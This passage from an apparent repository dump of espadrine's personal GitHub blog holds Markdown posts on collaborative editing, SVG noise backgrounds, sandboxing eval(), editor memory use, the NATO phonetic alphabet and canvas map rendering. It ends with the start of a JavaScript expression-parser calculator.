timeSlice);\n};\n\n// vim: ft=javascript\n"
},
{
"alpha_fraction": 0.7790359258651733,
"alphanum_fraction": 0.7838886976242065,
"avg_line_length": 72.5952377319336,
"blob_id": "6cf5de3f6c42f549f106b6e2bc7d2e1a155f54f9",
"content_id": "ce3c5852b794eae1d34a8d963442eb6aae60a911",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3093,
"license_type": "no_license",
"max_line_length": 366,
"num_lines": 42,
"path": "/blog/src/thefiletree-design-log-3.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# TheFileTree Design Log 3: Collaborative Editing\n\nI finally implemented the following API:\n\n- `GET /file?op=edit&app=text` (WebSocket): use the [Canop][] protocol to synchronize the file's content and autosave it.\n\n[Canop]: https://github.com/espadrine/canop\n\nTo get there, I improved Canop to finalize its protocol and survive disconnections. I made it more resilient to edge-cases and streamlined its API. I even added the ability to create brand new fundamental operations as a Canop user.\n\nI chose to go with [Canop][] instead of [jsonsync][], even though I appeared to lean towards the latter in previous design logs, because implementing index rebasing is non-trivial (especially for jsonsync), and I had already mostly done so with Canop.\n\nOn the other hand, it only supports strings. The protocol is designed to allow full JSON data, however. Additionally, strings are by far the harders data type to implement synchronization for. Arrays are slightly easier (and the index rebasing necessary to make them work is the same as that for strings), and the others are trivial.\n\n[jsonsync]: https://github.com/espadrine/jsonsync\n\n## User Interface\n\nI have designed Canop with certain events to allow for the display of the synchronization state (unsyncable (ie, offline), syncing, and synced).\n\nThis was problematic in thefiletree.com previously, as it was not at all clear whether we had suddenly been disconnected, and there were no reconnection. Closing the tab could therefore cause us to lose our changes… Yet there was no save button.\n\n## Details\n\nI don't save the edit history server-side, so local operations after a disconnection won't be able to rebase on top of other operations. I get the feeling that past a few seconds of disconnection, concurrent editing can severely damage the user's intended edition, as rebased operation may lose what the user entered without them having seen someone's cursor arrive.\n\n(Of course, nothing precludes someone from deleting the whole file, removing your changes, but that is malice, not accident. What we want to forbid are accidental loss. Malicious changes are inevitable; or rather, being resistant to them requires complex graph synchronization, solving the byzantine generals problem, and saving the full non-linear edit history.)\n\nI don't even save the file's revision number, so the client cannot tell whether there has been zero changes since the disconnection and apply local changes from there.\n\nMy plan: save the revision number so that local changes can be applied without a sweat when the file wasn't concurrently modified.\n\nIf it was, download a diffing library, and perform a diff. Display a visualization of the changes that would be applied to the local document (with local changes) if upstream changes were applied, and local changes rebased on top of them.\n\n\"Do you want to apply remote changes?\" Yes / No, save my document at a new location.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2017-04-02T19:19:00Z\",\n \"keywords\": \"tree\" }\n</script>\n"
},
{
"alpha_fraction": 0.7096590995788574,
"alphanum_fraction": 0.765625,
"avg_line_length": 63.587154388427734,
"blob_id": "8a8e1a4ca4bebbec9724ebe8d30b55a698a82e9e",
"content_id": "52c123ac04f92681a2fd9c33b99557aac6841941",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 7044,
"license_type": "no_license",
"max_line_length": 424,
"num_lines": 109,
"path": "/blog/src/noisy-background-image.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Noisy Background Image\n\nFor a long time, I have learned all the techniques to get a random background noise. Now that I believe I master them all and invented a new one, I feel like I can discuss the subject.\n\n## Inserted PNG Image\n\nThe most obvious technique is to rely on Gimp (or Photoshop, or <insert your bitmap image doctoring progam>) to perform the image randomization.\n\n\n\nTo get raw random pixels, you can rely on Hurl noise:\n\n\n\n\n\nIf you fancy smoother random transitions, Perlin noise does the job:\n\n\n\n\n\nYou should play with the opacity slider in order to have something much more discreet.\n\nThen, you need to include the image. You could of course just write this CSS code:\n\n```\nhtml {\n background: url(./img.png);\n}\n```\n\nHowever, it is of better form to include it as base64 data. Having to wait for the browser to notice the image and start downloading it gives the appearance of a slow page load experience. Downloading everything on the go is better, even if base64 data is bigger than raw data, at least until the glorious days of HTTP 2.0 Push (where you'll be able to send the image alongside the web page in a single HTTP response cycle).\n\nHere's a command that outputs your base64 data.\n\n```\nnode -p 'fs = require(\"fs\"); fs.writeFileSync(\"img.png.base64\", fs.readFileSync(\"img.png\", \"base64\"));'\n```\n\nCopy and paste the data here:\n\n```\nhtml {\n background: url(data:image/png;base64,iVBORw0KGgoAA…), black;\n}\n```\n\n\n\nI wish I could link this image to a jsbin that shows the code, but the image data is too large for that. Incidentally, this is an excellent introduction to what comes next.\n\n## Prime Numbers\n\nHaving a large image download is very sad. Fortunately, we can achieve a similar level of pixel noise with two or three small images. A single smaller image gives poor results:\n\n\n\nBut relying on two or three square images whose width is a prime number guarantees that the pattern won't repeat for a very long time. Given two images of size MxM and NxN, with M and N prime numbers, the resulting image won't repeat until MxN. Let's try with M = 13 and N = 23. Then the repetition will only happen at 299. Add to that a 11x11 pixels image and you will get something of size 3289x3289 pixels.\n\nOf course, that is only true of truly random data, which is definitely not the case of Gimp's Hurl, unfortunately. To achieve a better result with better compression, I use a baseline of grey `0x808080`, add an RGB noise (since I use a grayscale color profile, it only changes colors in shades of gray), and put the opacity somewhere close to 5%.\n\n\n\nHere is what we get with 3 images of sizes 11, 13 and 23, all set at 5% opacity:\n\n[](http://jsbin.com/senaqu/1)\n\nThat webpage costs 1978 bytes, compared to 3969 bytes for a single image of 50x50 pixels generated using the same technique, with which repetition would be visible ([example here](http://jsbin.com/pepumo/1)).\n\nOf course, this prime number trick only works for completely random background pixels. I was always dissatisfied that there was no way to have similarly small image downloads for background Perlin noise.\n\nUntil I found a way.\n\n## SVG Filters\n\nIt turns out browsers already have the Perlin noise code in their SVG engines. All that is needed is to generate an SVG image at load time, and assign it to the background. The trick is to use the [Turbulence filter effect](http://www.w3.org/TR/SVG11/filters.html#feTurbulenceElement) with skill. 
\n    (function background() {\n      // Generate a viewport-sized SVG with a turbulence noise filter,\n      // then set it as the page background through a data URL.\n      var seed = (Math.random() * 1000)|0;\n      var domHtml = document.documentElement;\n      var svg = '<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"' + domHtml.clientWidth + '\" height=\"' + domHtml.clientHeight + '\"><filter id=\"a\"><feTurbulence baseFrequency=\".2\" numOctaves=\"1\" seed=\"' + seed + '\"></feTurbulence><feColorMatrix values=\"1 1 1 1 0 1 0 0 0 0 1 0 0 0 0 0 0 0 0 0.04\"></feColorMatrix></filter><rect width=\"100%\" height=\"100%\" filter=\"url(#a)\"></rect></svg>';\n      domHtml.style.backgroundImage = 'url(data:image/svg+xml;base64,' + btoa(svg) + ')';\n    }());\n\n[](http://jsbin.com/qihagu/1)\n\nI tend to favor using JS to produce this effect, because this way, we can generate a unique seed on every page load. That said, it is entirely possible to put it in a data URL, as we have done before.\n\nThe [resulting page](http://jsbin.com/qihagu/1) costs a mere 912 bytes, far smaller than our previous experiments with PNG images. And that's with a random seed; it is even smaller (although, not by much, 736 bytes) when inserted directly in the CSS as base64 data.\n\nOf course, the picture above is just an example. There are many more possibilities based on this technique. For instance, here, I use turbulence; I could go for fractal noise. Playing with the number of octaves at high levels exposes IEEE-754 errors in the mandatory algorithm, which gives interesting dotted results…\n\n\n\nUsing different base frequencies between the X and Y coordinates gives more surprises. We can further combine this with a rotation to get visible random diagonals. Of course we can also get raw random pixels, as we had before, using a high base frequency (somewhere around 0.4). Experimenting with the Color Matrix can give stellar results as well, despite its scary appearance.\n\n----\n\nHere you go! Everything you needed to know about noisy background images, including the state of the art in terms of small image downloads with perfect results.\n\nI already started using this here (which the astute reader will surely have noticed), and on [Aulx](http://espadrine.github.io/aulx), the autocompletion engine for the Web which I'll continue improving in the future.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-10-22T20:11:00Z\",\n \"keywords\": \"css, svg\" }\n</script>\n"
},
{
"alpha_fraction": 0.7073981761932373,
"alphanum_fraction": 0.7182044982910156,
"avg_line_length": 60.69230651855469,
"blob_id": "182da562a355ea3d3e84bc5aca9a84a9d47e192f",
"content_id": "ce4be5fe2e86d4e62611fdbf3cd9ade1da4e1874",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2410,
"license_type": "no_license",
"max_line_length": 442,
"num_lines": 39,
"path": "/blog/src/dont-be-eval.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Don’t be eval()\n\n[TLDR: <https://github.com/espadrine/localeval>]\n\nWe JS programmers know how evil `eval()` is. An attempt at copying the fancy concept of Lisp's metacircular evaluator, it takes a string instead of Lisp's homoiconic quoted syntax tree. Beyond that, unlike Scheme (which allows to specify your own environment), it evaluates the code in the current lexical environment. Consequently, it can mess with all variable bindings in scope, and will leak to the outside world all variables it defines.\n\nI sometimes wondered how I would go about making a fast, safe JS evaluator without relying on something as complicated as Brendan Eich's implementation of JS in JS, [Narcissus](https://github.com/mozilla/narcissus).\nI have [figured it out](https://github.com/espadrine/localeval) recently.\nLet me tell you how.\n\nFirst of all, unlike what many believe, `eval()` is not the only built-in JS function that takes JS code as a string for evaluation. The `Function()` constructor does too. Its last argument contains the code for the body of the function, as a string, and the arguments before that one contain the names of the function's parameters.\n\n var f = Function('a', 'b', 'return a * b');\n console.log(f(6, 7)); // 42\n\nJust like `eval()`, it has destructive access to the surrounding variables.\n\n var n = 0;\n var f = Function('a', 'n++; return a + n');\n console.log([f(3), f(3)]); // 3, 4\n console.log(n); // 2\n\nHaving the ability to create a new function means that we can carefully *construct exactly the environment* that we wish to target, kind of like a green screen in the background, on which you may clip any sandbox (that is, any set of symbol bindings) and run your code on top of it.\n\nBeyond that, it gives you the ability to *shadow access to outside global variables*. Yes, you may literally, with the power of ES5, navigate the full prototype chain of the global object (which you can access with `this` on a non-strict-mode function) and aggregate all the symbols in a huge string that looks like `var foo, bar, …;`!\n\n var reset = 'var ';\n var obj = this;\n var globals;\n while (obj !== null) {\n globals = Object.getOwnPropertyNames(obj);\n for (var i = 0; i </https:>\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2013-06-12T22:21:00Z\",\n \"keywords\": \"js\" }\n</script>\n"
},
{
"alpha_fraction": 0.7144384980201721,
"alphanum_fraction": 0.7422459721565247,
"avg_line_length": 34.96154022216797,
"blob_id": "9a2ddbc3ad3a7f613ead99f29c2f3c8838f71d20",
"content_id": "63fd1535d0a1e9ff18304c51de1a21736e452213",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 935,
"license_type": "no_license",
"max_line_length": 328,
"num_lines": 26,
"path": "/blog/src/low-fat-text-editors.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Low-Fat Text Edtors\n\nMemory-wise, after having run for mild editing, the following text editors take the following amount of RAM:\n\nBrackets: more than 124M\n\nSublime Text: 67M\n\nKate: 44M\n\nEmacs: 16M\n\nVim: 8M\n\nAmazingly, each take twice the memory of the next.\n\n(No add-ons except for vim. Emacs with ido-mode on. All running in GUI mode. All in latest version. All having the same (JS) file opened. Figures rounded. Linux KDE.)\n\nIt is highly likely that Atom will take about the same as Brackets. I don't know how the Vim gods did it, but I would need 15 instances (as in, windows with opened buffer) to take the amount of space Brackets takes. Considering I customized it with most features that Sublime / Brackets users benefit from, picture me impressed.\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-03-16T01:12:00Z\",\n \"keywords\": \"editor\" }\n</script>\n"
},
{
"alpha_fraction": 0.7373314499855042,
"alphanum_fraction": 0.7494188547134399,
"avg_line_length": 42.02000045776367,
"blob_id": "e241eb446b07b00e384b7675a1bcac8eebe9508c",
"content_id": "8676186e12518fe945240cfad35f523f1a7e89bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2163,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 50,
"path": "/blog/src/what-i-built-in-2017.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# What I Made In 2017\n\nAfter some time working on the collaboration between [Captain Train][] and its\nacquirer [Trainline][], to bring together both companies’ technologies through a\ncommon protocol, and maintaining the SNCF integration through major evolutions\nof their offerings, I left the company to join [Qonto][]\n\nThis bank startup that just came out of beta when I joined (I literally removed\nthe beta tag from the website on my first week) offers the most streamlined\nonline banking experience for businesses.\n\nI brought together a great team. This year, we will focus on making the backend\nbanking integration top-notch.\n\nAs a result, I had less time for free-time open-source. There were three big\ndirections to what I did:\n\n- The [Shields.io][] core team increased, and it allowed us to optimize things\n like the [font-width computation][] (hat tip to Paul Melnikow for that).\n- I pursue [TheFileTree][], to provide the infrastructure for a self-helping\n community of makers. (It is very far from there yet.) I switched it to using\n the [Canop][] system, which I still have to make support a full JSON, to allow\n for more complex apps. I redid the API and made the app system as designed\n the year before.\n- I played with AI in the stride of DeepMind’s [AlphaGo][] effort, and produced\n a Node.js Go library, [badukjs][].\n\nTo sum up, this year, I switched focus from “me” to “us”. Great things are not a\nlonely job, but an active coordination.\n\nNext year, I will focus on building-block infrastructure for more cooperation.\n\n[Previously][].\n\n[Captain Train]: https://trainline.eu\n[Trainline]: https://www.thetrainline.com\n[Qonto]: https://qonto.eu\n[Shields.io]: https://shields.io\n[font-width computation]: https://github.com/badges/shields/pull/1390\n[TheFileTree]: https://thefiletree.com\n[badukjs]: https://github.com/espadrine/badukjs\n[Canop]: https://github.com/espadrine/canop\n[Previously]: http://espadrine.github.io/blog/posts/what-i-made-in-2016.html\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2018-02-23T21:37:12Z\",\n \"keywords\": \"retro\" }\n</script>\n"
},
{
"alpha_fraction": 0.7435601949691772,
"alphanum_fraction": 0.770280659198761,
"avg_line_length": 37.82089614868164,
"blob_id": "d0a11ceef0fa74bff57937d2f9d2d701b8afb6fc",
"content_id": "dfe446a5997ab72ca049abb1300926000f0952b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5226,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 134,
"path": "/blog/src/nato-phonetic-alphabet.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# A Learning Resource for the NATO Phonetic Alphabet\n\n<iframe src=https://espadrine.github.io/nato-alphabet/\n style='width:100%; height:1000px; border:0'></iframe>\n\nA while back, I wrote [a resource][learn]\nto help me learn the [NATO phonetic alphabet][NATO].\n\n*(Link to [the full website here][learn].)*\n\n## What does this resource do well?\n\nA major aspect of good learning, is the randomization of tests.\n\nWhen you must remember by heart a large number of element,\na common mistake I find in schoolbooks\nis for the exercises to repeat only the past ten new words or so.\n\nIt is critical, to achieve a leveled, continuous learning experience,\nto randomly sample all words previously learnt,\nregardless of how old.\nThat counteracts the inevitable forgetting of short-term-memory words.\n\n*If you can **predict** the words that your memory must remember,\nyou will subconsciously forget the words that won’t appear.*\nWorse, you may link them to the predictable sequence of words\nthat the test is built on,\ncausing you to only remember one word when it is next to the other,\nwhich in real life, it will often not be.\n\nThis principle is noticeably unfollowed in language manuals,\nwith predictable effects on my own learning.\nI was (and am) frustrated to not have tools like these.\n\nGood randomness is critical to healthy knowledge acquisition.\n\nIn fact, many machine learning systems heavily depend on that insight.\nFor instance, [AlphaGo][] carefully randomized the sequence of games\nand the stage of the games that it had to learn,\nto avoid the system from overfitting on one game, or on the late game.\n\n## Why did I want to learn it?\n\nWhen investigating production issues,\ndevelopers and operations managers often have to communicate identifiers\nso they can share their findings.\n\n> — “*Hey, take a look at payment authorization number\n> `78223a6b-6b41-41ac-9cc1-00b76a664ac9`:\n> the amount matches the settlement we are looking for.*”\n\n**Sequential identifiers** are short (at first),\nbut betray information about when the entity was created,\nwhich is often not welcome.\n*Identifiers should never contain potentially secret information.*\n\n**Traditional UUID v4** are not great at transmitting identifiers efficiently,\nespecially vocally.\n\nIndeed, sequences of digits have a higher error rate when vocally transmitted.\nThey are easy to confuse with each other, after all;\nusing a larger glyph set increases distinguishability.\n\n[At work][Qonto], we do have a lot of UUIDs.\nIn many spots in the deeper core of the system, however,\nI opted for **128-bit CSPRNG-produced base64 identifiers**.\nThey are shorter (⌈128÷log2(64)⌉ = 22 characters)\nand harder to mistype.\n\nLooking back, one flaw with those is that it is very hard\nto communicate them vocally.\nYou always end up having to specify uppercase / lowercase.\nEven when mentally copying these IDs on your own,\nyou often use the wrong case.\n\nInstead, **base32** does away with case,\nmaking it very suitable for vocal transmission.\nWhen lowercase, it is even particularly easy to read.\n\nI must not be the only one with that opinion.\nIn fact, in the Bitcoin world,\nthe account number format has been switched from a base58 one,\nto the new [Bech32][] addresses introduced with SegWit.\nBehold, it uses lowercase base32!\n\n> `bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4`\n\nOf course, Bitcoin addresses are still very long.\nToo long to transmit in a single breath.\n\nWe could constrain ourselves to 128 random 
\n> — “*Hey, take a look at payment authorization number `nhimasuge7f52`:\n> the amount matches the settlement we are looking for.*”\n\nThat, finally, can be easily transmitted using the NATO system.\n\n*(This system is likely overkill, but a fun thought.)*\n\n---\n\n*[Click to comment.][Comments]*\n\n[learn]: https://espadrine.github.io/nato-alphabet/\n[AlphaGo]: https://deepmind.com/blog/article/alphago-zero-starting-scratch\n[NATO]: https://www.nato.int/cps/en/natohq/declassified_136216.htm\n[Qonto]: https://qonto.com/en\n[Bech32]: https://github.com/bitcoin/bips/blob/master/bip-0173.mediawiki\n[PRP]: https://en.wikipedia.org/wiki/Pseudorandom_permutation\n[Speck64/128]: https://nsacyber.github.io/simon-speck/\n[Comments]: https://www.reddit.com/r/espadrine/comments/jydh6k/a_learning_resource_for_the_nato_phonetic_alphabet/\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2020-11-11T19:18:25Z\",\n \"keywords\": \"codes\" }\n</script>\n"
},
{
"alpha_fraction": 0.7407106757164001,
"alphanum_fraction": 0.7530964612960815,
"avg_line_length": 35.48147964477539,
"blob_id": "5ed5254556921f74728c77fe8171636bce4cb1e4",
"content_id": "2978c0a4b61d4062811656395c50b295cbc25aab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4929,
"license_type": "no_license",
"max_line_length": 390,
"num_lines": 135,
"path": "/blog/src/canvas-tricks.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Canvas Tricks\n\nI work on a 4X-style game called Not My Territory (Yet) as a hobby. There are opposing teams with colors attributed to them. They own territory, and therefore have borders.\n\nHowever, making borders look good on the map was always a bit of a challenge.\n\nI wanted them to feel old-school.\n\nI didn't want them to look geometrical.\n\nAnd I needed them to be discrete, so as not to obstruct the view.\n\n\n\n----\n\nFirst, the shape was blocky, because it is the easiest thing to do with hexes:\n\n\n\nThen I smoothed it out with splines, but even that was too regular.\n\n\n\nI added irregularities, which was tricky, since a small change in the border (say, a tile added to it) must not change the shape of the rest of the border.\n\n\n\nI used the algorithm to generate irregularities to draw how far a unit can move in one turn, as well.\n\nBefore:\n\n\n\nAfter:\n\n\n\n(Out of curiosity, here's what the un-splined version looks like, the irregularities are very apparent: I nudge one vertex out of two.)\n\n\n\n----\n\nNext, the border color. After a [Reddit poll][] where I presented [fairly](http://i.imgur.com/t5JH8ma.png) [different](http://i.imgur.com/a6yHLqG.png) [options](http://i.imgur.com/8t5PLL8.png), I settled on this:\n\n\n\nThe tricky bit, this time, is to ensure that borders don't overlap when two nations are right next to each other. To achieve this result, I use canvas clipping, drawing only the inside of the border, after having drawn a full border for each opposing camp. Chrome pixelates the edge of clipped painted data, probably because of its Path implementation, but that's the best solution I found.\n\nAlso, yet again, I ensured that dashed borders didn't change with a small change in the border.\n\nBefore:\n\n\n\n→\n\n\n\nAfter:\n\n\n\n→\n\n\n\nThat was done by putting a dash one out of two consecutive hexagonal edge along the border.\n\n[Reddit poll]: http://www.reddit.com/r/gamedev/comments/2avffd/4x_which_country_border_is_most_pleasing/\n\n----\n\nWhat next? I found the map's shoreline (and all terrain transitions) too harsh and geometric as well.\n\n\n\nI tried to use the same trick as before, irregular splines, but it doesn't work this time.\n\n\n\nI accidentally found out that making my sprite images square gave a surprisingly good random shoreline.\n\n\n\nI added some noisy irregularities to the sprite sheet.\n\n\n\nI added a beach tile in the sprites, and the result is a lot better!\n\n\n\nBefore:\n\n\n\nAfter:\n\n\n\n----\n\nFinally, while it was cool to have [a map the size of a cosmic superbubble](https://www.youtube.com/watch?v=BFSW2FgWQR0), having a game where your enemy can infinitely escape isn't fun. I enclose each new map in a random continent the size of Corsica.\n\n\n\n----\n\nDid I say \"finally\"? This is the last item! I improved the look of the map when unzoomed.\n\nBefore:\n\n\n\nMore recently:\n\n\n\nNow:\n\n\n\nBonus picture, 3D rendering, a fair bit of work with many challenges to come:\n\n\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2014-10-05T22:41:00Z\",\n \"keywords\": \"game, canvas\" }\n</script>\n"
},
{
"alpha_fraction": 0.5931060910224915,
"alphanum_fraction": 0.5976762175559998,
"avg_line_length": 28.1422119140625,
"blob_id": "e5ea14892f13d44e87850dd53d50d74249cb2060",
"content_id": "f95c389afac02b3c7af22e9f154b7e8f9ffba49b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 12926,
"license_type": "no_license",
"max_line_length": 397,
"num_lines": 443,
"path": "/blog/assets/mean-range-of-a-bell-curve-distribution/cli-calculator.js",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "let mpf;\nclass Calculator {\n // mpWasm is https://github.com/cag/mp-wasm\n // We make it provided externally to support multiple platforms.\n constructor(mpWasm) {\n this.parser = new Parser();\n this.evaluator = new Evaluator();\n this.mpf = mpf = mpWasm.mpf;\n }\n\n // Returns:\n // - result: a list of MPFR numbers.\n // - tree: the abstract syntax tree representation of the input.\n // - errors: a list of errors in parsing or evaluating the input.\n compute(input) {\n const syntax = this.parser.parse(input);\n if (syntax.errors.length > 0) {\n return { result: null, tree: syntax.tree, errors: syntax.errors };\n }\n const { result, errors } = this.evaluator.eval(syntax.tree);\n return { result, tree: syntax.tree, errors };\n }\n\n // Returns:\n // - tree: the abstract syntax tree representation of the input.\n // - errors: a list of errors in parsing the input.\n parse(input) {\n return this.parser.parse(input);\n }\n}\n\nclass Parser {\n parse(input) {\n const tree = new SyntaxTree(input);\n return { tree, errors: tree.errors };\n }\n}\n\nclass SyntaxTree {\n constructor(input) {\n this.text = input;\n this.cursor = 0;\n this.line = 1;\n this.column = 1;\n this.errors = [];\n this.root = this.parseRoot();\n }\n\n parseRoot() {\n const expr = this.parseExpr();\n this.skipWhitespace();\n if (!this.endReached()) {\n this.addError('Trailing characters');\n }\n return expr;\n }\n\n parseExpr() {\n this.skipWhitespace();\n let node = this.newNode(SyntaxTreeNode.type.expr);\n\n const rest = this.read(this.text.length);\n const type = SyntaxTreeNode.nameFromType.findIndex(type =>\n SyntaxTreeNode.token[type].test(rest));\n let subExpr;\n switch (type) {\n case SyntaxTreeNode.type.number:\n node = this.parseNumber();\n break;\n case SyntaxTreeNode.type.paren:\n node = this.parseParen();\n break;\n case SyntaxTreeNode.type.sep:\n break; // End of the expression.\n case SyntaxTreeNode.type.prefixOp:\n node.type = type;\n node.func = SyntaxTreeNode.funcFromOperator[this.read()];\n this.advance();\n subExpr = this.parseExpr();\n node.children = [subExpr];\n break;\n case SyntaxTreeNode.type.func:\n node = this.parseFunction(type);\n break;\n default:\n this.addError(\"Invalid expression\");\n this.advance();\n }\n this.closeNode(node);\n\n // Infix operators.\n this.skipWhitespace();\n if (SyntaxTreeNode.token.infixOp.test(this.read())) {\n const operator = SyntaxTreeNode.funcFromOperator[this.read()];\n if (!operator) {\n throw new Error(`Invalid operator type ${this.read()}`);\n }\n\n // The expression to return is an infix operation.\n const firstOperand = node;\n\n node = this.newNode(SyntaxTreeNode.type.infixOp);\n node.startAlong(firstOperand);\n node.func = operator;\n this.advance();\n\n const secondOperand = this.parseExpr();\n node.children = [firstOperand, secondOperand];\n\n // Handle associativity.\n if (secondOperand.type === SyntaxTreeNode.token.infixOp &&\n SyntaxTreeNode.operatorAssociativity.get(operator) >\n SyntaxTreeNode.operatorAssociativity.get(secondOperand.func)) {\n // In this situation, we must promote the second operator to toplevel.\n // [firstOperand <operator> [second[0] <secondOperator> second[1]]]\n // → [[firstOperand <operator> second[0]] <secondOperator> second[1]]\n const newFirstOperand = this.newNode(SyntaxTreeNode.type.infixOp);\n newFirstOperand.startAlong(firstOperand);\n newFirstOperand.endAlong(secondOperand.children[0]);\n newFirstOperand.func = operator;\n newFirstOperand.children = [firstOperand, secondOperand.children[0]];\n node.func = 
secondOperand.func;\n node.children = [newFirstOperand, secondOperand.children[1]];\n }\n this.closeNode(node);\n }\n\n // Postfix operators.\n this.skipWhitespace();\n while (SyntaxTreeNode.token.postfixOp.test(this.read())) {\n const operator = SyntaxTreeNode.funcFromOperator[this.read()];\n if (!operator) {\n throw new Error(`Invalid operator type ${this.read()}`);\n }\n\n // The expression to return is a postfix operation.\n const operand = node;\n this.closeNode(operand);\n\n node = this.newNode(SyntaxTreeNode.type.postfixOp);\n node.startAlong(operand);\n node.func = operator;\n this.advance();\n node.children = [operand];\n this.closeNode(node);\n this.skipWhitespace();\n }\n\n return node;\n }\n\n // Expression of the form \"12.5\"\n parseNumber() {\n this.skipWhitespace();\n const node = this.newNode(SyntaxTreeNode.type.number);\n\n const rest = this.read(this.text.length);\n const match = SyntaxTreeNode.token.number.exec(rest);\n this.advance(match[0].length);\n node.number = mpf(match[0].replace(/_/g, ''));\n\n this.closeNode(node);\n return node;\n }\n\n // Expression of the form \"(…, …)\"\n parseParen() {\n this.skipWhitespace();\n const node = this.newNode(SyntaxTreeNode.type.paren);\n\n if (this.read() !== '(') { // We only throw when it should never happen.\n throw new Error(\"Invalid paren does not start with a parenthesis\");\n }\n this.advance();\n\n let closingParenReached = false;\n while (!closingParenReached && this.cursor < this.text.length) {\n this.skipWhitespace();\n node.children.push(this.parseExpr());\n switch (this.read()) {\n case ',':\n this.advance();\n this.skipWhitespace();\n break;\n case ')':\n this.advance();\n closingParenReached = true;\n break;\n default:\n this.addError(\"Invalid character in parenthesized expression\");\n this.advance();\n }\n }\n this.closeNode(node);\n return node;\n }\n\n // Expression of the form \"func(…, …)\"\n parseFunction() {\n this.skipWhitespace();\n const node = this.newNode(SyntaxTreeNode.type.func);\n\n const rest = this.read(this.text.length);\n const funcMatch = SyntaxTreeNode.token.func.exec(rest);\n if (funcMatch == null) {\n throw new Error(\"Invalid function name\");\n }\n node.func = funcMatch[0];\n this.advance(node.func.length);\n this.skipWhitespace();\n if (this.read() !== '(') {\n this.addError(\"Invalid function with no parameters\");\n this.advance();\n this.closeNode(node);\n return node;\n }\n const args = this.parseParen();\n node.children = args.children;\n\n this.closeNode(node);\n return node;\n }\n\n // Read the next n characters.\n read(n = 1) {\n return this.text.slice(this.cursor, this.cursor + n);\n }\n\n // Advance the cursor by n characters.\n advance(n = 1) {\n for (let i = this.cursor; i < this.cursor + n; i++) {\n if (this.text[i] === '\\n') {\n this.line++;\n this.column = 1;\n } else {\n this.column++;\n }\n }\n this.cursor += n;\n }\n\n skipWhitespace() {\n while (/^[ \\t\\n]/.test(this.read())) {\n this.advance();\n }\n }\n\n endReached() {\n return this.cursor >= this.text.length;\n }\n\n newNode(type) {\n return new SyntaxTreeNode(\n type, this.cursor, this.cursor + 1, this.line, this.column, this.text);\n }\n\n closeNode(node) {\n node.end = this.cursor;\n node.endLine = this.line;\n node.endColumn = this.column;\n node.text = this.text.slice(node.start, node.end);\n }\n\n addError(message) {\n this.errors.push(new SyntaxTreeError(message, this.line, this.column));\n }\n\n toString() {\n return this.root.toString();\n }\n}\n\nclass SyntaxTreeNode {\n constructor(type, start, 
end, startLine, startColumn, text) {\n this.type = type;\n this.text = text;\n this.children = [];\n this.func = null;\n this.number = null;\n this.start = start;\n this.end = end;\n this.startLine = this.endLine = startLine;\n this.startColumn = this.endColumn = startColumn;\n }\n\n startAlong(node) {\n this.start = node.start;\n this.startLine = node.startLine;\n this.startColumn = node.startColumn;\n }\n\n endAlong(node) {\n this.end = node.end;\n this.endLine = node.endLine;\n this.endColumn = node.endColumn;\n }\n\n // Returns:\n // - result: a list of MPFR numbers.\n // - errors: a list of errors in evaluating the node.\n eval() {\n const childrenEval = this.children.map(c => c.eval());\n const childrenValues = childrenEval.map(c => c.result)\n .reduce((list, val) => list.concat(val), []);\n const result = [], errors = [];\n let operator;\n switch (this.type) {\n case SyntaxTreeNode.type.root:\n case SyntaxTreeNode.type.expr:\n result.push(mpf(0));\n break;\n case SyntaxTreeNode.type.number:\n result.push(mpf(this.number || 0));\n break;\n case SyntaxTreeNode.type.paren:\n case SyntaxTreeNode.type.sep:\n result.push(...childrenValues);\n break;\n case SyntaxTreeNode.type.prefixOp:\n switch (this.func) {\n case \"add\":\n case \"sub\":\n result.push(mpf[this.func](0, childrenValues[0]));\n break;\n default:\n throw new Error(`Invalid prefix operator ${this.func}`);\n }\n break;\n case SyntaxTreeNode.type.infixOp:\n result.push(childrenValues.reduce((sum, arg) => sum[this.func](arg)));\n break;\n case 